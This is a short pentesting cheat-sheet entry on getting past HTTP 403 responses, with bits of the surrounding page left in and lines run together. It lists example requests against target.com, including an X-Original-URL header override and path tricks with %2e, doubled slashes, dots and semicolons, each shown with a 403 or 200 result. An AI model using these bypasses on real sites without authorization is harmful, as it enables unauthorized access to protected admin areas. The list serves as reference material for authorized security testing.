Bypass 403 (Forbidden)
GET /admin HTTP/1.1
Host: target.comGET /anything HTTP/1.1
Host: target.com
X-Original-URL: /adminhttp://target.com/admin => 403http://target.com/%2e/admin => 200http://target.com/admin => 403http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200Tools
References
Last updated